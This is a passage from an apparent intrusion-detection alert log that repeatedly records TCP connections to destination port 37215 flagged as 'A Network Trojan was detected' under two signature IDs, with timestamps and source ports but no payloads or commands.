                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529668
                  SID:2829579
                  Source Port:60824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627956
                  SID:2835222
                  Source Port:48976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848890
                  SID:2829579
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585210
                  SID:2835222
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704293
                  SID:2835222
                  Source Port:56776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664809
                  SID:2829579
                  Source Port:38504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298509
                  SID:2829579
                  Source Port:38644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583471
                  SID:2835222
                  Source Port:41352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737612
                  SID:2829579
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278693
                  SID:2829579
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276502
                  SID:2829579
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277345
                  SID:2829579
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491411
                  SID:2829579
                  Source Port:35580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799349
                  SID:2835222
                  Source Port:38224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700998
                  SID:2835222
                  Source Port:55172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2835222
                  Source Port:40066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695777
                  SID:2829579
                  Source Port:59458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696122
                  SID:2835222
                  Source Port:43124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2829579
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787895
                  SID:2829579
                  Source Port:54574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629539
                  SID:2829579
                  Source Port:41716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609040
                  SID:2835222
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911215
                  SID:2829579
                  Source Port:38212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799501
                  SID:2835222
                  Source Port:39952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546557
                  SID:2829579
                  Source Port:60576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911286
                  SID:2835222
                  Source Port:34556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655791
                  SID:2835222
                  Source Port:33716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846728
                  SID:2835222
                  Source Port:45264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586032
                  SID:2829579
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371975
                  SID:2829579
                  Source Port:58802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293759
                  SID:2835222
                  Source Port:36830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496055
                  SID:2829579
                  Source Port:59352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316235
                  SID:2835222
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628787
                  SID:2829579
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847431
                  SID:2829579
                  Source Port:59336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885935
                  SID:2829579
                  Source Port:57540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584405
                  SID:2835222
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738112
                  SID:2835222
                  Source Port:59190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696385
                  SID:2829579
                  Source Port:35286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749968
                  SID:2835222
                  Source Port:40674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766003
                  SID:2835222
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2835222
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695257
                  SID:2835222
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702143
                  SID:2829579
                  Source Port:49196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795798
                  SID:2835222
                  Source Port:33282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490277
                  SID:2835222
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490004
                  SID:2835222
                  Source Port:57652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908046
                  SID:2835222
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312244
                  SID:2835222
                  Source Port:52268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911708
                  SID:2835222
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.912290
                  SID:2829579
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790716
                  SID:2829579
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489918
                  SID:2835222
                  Source Port:59840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886513
                  SID:2829579
                  Source Port:38790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316499
                  SID:2829579
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492454
                  SID:2829579
                  Source Port:45452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742652
                  SID:2829579
                  Source Port:47298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788844
                  SID:2829579
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.644133
                  SID:2835222
                  Source Port:54980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887162
                  SID:2835222
                  Source Port:50532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585759
                  SID:2835222
                  Source Port:54820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493313
                  SID:2829579
                  Source Port:55310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790331
                  SID:2829579
                  Source Port:39720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661692
                  SID:2835222
                  Source Port:59412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788875
                  SID:2829579
                  Source Port:56332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299086
                  SID:2835222
                  Source Port:50438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529254
                  SID:2829579
                  Source Port:40050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579003
                  SID:2829579
                  Source Port:46062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755631
                  SID:2829579
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577212
                  SID:2829579
                  Source Port:52636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656132
                  SID:2829579
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926743
                  SID:2835222
                  Source Port:58618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788875
                  SID:2835222
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771022
                  SID:2829579
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755576
                  SID:2835222
                  Source Port:38518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294606
                  SID:2835222
                  Source Port:35196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713743
                  SID:2835222
                  Source Port:39968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790529
                  SID:2835222
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586430
                  SID:2835222
                  Source Port:48164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.761019
                  SID:2829579
                  Source Port:47932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887331
                  SID:2829579
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907374
                  SID:2829579
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2829579
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660601
                  SID:2835222
                  Source Port:39056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530888
                  SID:2829579
                  Source Port:56652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742611
                  SID:2835222
                  Source Port:44266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530281
                  SID:2829579
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771026
                  SID:2829579
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788860
                  SID:2829579
                  Source Port:50422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496017
                  SID:2835222
                  Source Port:38974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911962
                  SID:2829579
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766000
                  SID:2835222
                  Source Port:56814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588394
                  SID:2835222
                  Source Port:49056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453859
                  SID:2835222
                  Source Port:58090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684145
                  SID:2835222
                  Source Port:38838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768743
                  SID:2829579
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.691265
                  SID:2835222
                  Source Port:42602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942518
                  SID:2835222
                  Source Port:45540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802007
                  SID:2835222
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906783
                  SID:2829579
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887483
                  SID:2835222
                  Source Port:39282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488675
                  SID:2829579
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2829579
                  Source Port:53266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911709
                  SID:2835222
                  Source Port:53810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806147
                  SID:2829579
                  Source Port:58318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628403
                  SID:2835222
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583175
                  SID:2835222
                  Source Port:44374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695733
                  SID:2835222
                  Source Port:40328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488128
                  SID:2829579
                  Source Port:49048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536553
                  SID:2835222
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488228
                  SID:2835222
                  Source Port:41346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493322
                  SID:2829579
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578898
                  SID:2835222
                  Source Port:46222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700271
                  SID:2829579
                  Source Port:57312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906114
                  SID:2829579
                  Source Port:48990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276771
                  SID:2835222
                  Source Port:51518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300247
                  SID:2829579
                  Source Port:56628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493151
                  SID:2835222
                  Source Port:57924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694991
                  SID:2829579
                  Source Port:35032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887967
                  SID:2835222
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872262
                  SID:2829579
                  Source Port:59810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527892
                  SID:2835222
                  Source Port:60646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493313
                  SID:2829579
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868326
                  SID:2829579
                  Source Port:53042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930496
                  SID:2829579
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316548
                  SID:2835222
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888332
                  SID:2835222
                  Source Port:45048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790743
                  SID:2835222
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906732
                  SID:2829579
                  Source Port:41786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785609
                  SID:2829579
                  Source Port:39462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596099
                  SID:2835222
                  Source Port:47574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771022
                  SID:2829579
                  Source Port:50756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353810
                  SID:2829579
                  Source Port:59584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923943
                  SID:2829579
                  Source Port:37938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578625
                  SID:2835222
                  Source Port:37290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661172
                  SID:2835222
                  Source Port:38722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627798
                  SID:2835222
                  Source Port:51392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786513
                  SID:2835222
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543213
                  SID:2829579
                  Source Port:55974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656492
                  SID:2835222
                  Source Port:38426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719413
                  SID:2829579
                  Source Port:44662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628961
                  SID:2835222
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650776
                  SID:2829579
                  Source Port:46800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660952
                  SID:2829579
                  Source Port:50174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547378
                  SID:2835222
                  Source Port:48184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294722
                  SID:2835222
                  Source Port:37642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628805
                  SID:2835222
                  Source Port:41262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530616
                  SID:2829579
                  Source Port:54688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543379
                  SID:2829579
                  Source Port:60034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511629
                  SID:2829579
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859309
                  SID:2829579
                  Source Port:54198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543131
                  SID:2835222
                  Source Port:59444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916881
                  SID:2835222
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542687
                  SID:2829579
                  Source Port:52628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276474
                  SID:2829579
                  Source Port:56686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907966
                  SID:2835222
                  Source Port:35220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.372034
                  SID:2835222
                  Source Port:34948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.693809
                  SID:2829579
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594640
                  SID:2829579
                  Source Port:60812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817825
                  SID:2829579
                  Source Port:50688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766444
                  SID:2835222
                  Source Port:33474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660954
                  SID:2835222
                  Source Port:56706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.548217
                  SID:2829579
                  Source Port:36392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793140
                  SID:2835222
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651350
                  SID:2835222
                  Source Port:53060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719875
                  SID:2835222
                  Source Port:49882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847566
                  SID:2829579
                  Source Port:60420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588503
                  SID:2829579
                  Source Port:51202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930337
                  SID:2829579
                  Source Port:53208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766528
                  SID:2835222
                  Source Port:36558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719089
                  SID:2835222
                  Source Port:36342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651020
                  SID:2829579
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788925
                  SID:2829579
                  Source Port:51234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590036
                  SID:2829579
                  Source Port:48734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912526
                  SID:2829579
                  Source Port:40996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720015
                  SID:2829579
                  Source Port:55778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789860
                  SID:2835222
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.871430
                  SID:2829579
                  Source Port:43436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837217
                  SID:2835222
                  Source Port:48634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742352
                  SID:2835222
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888607
                  SID:2835222
                  Source Port:42150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918139
                  SID:2829579
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607295
                  SID:2829579
                  Source Port:32954
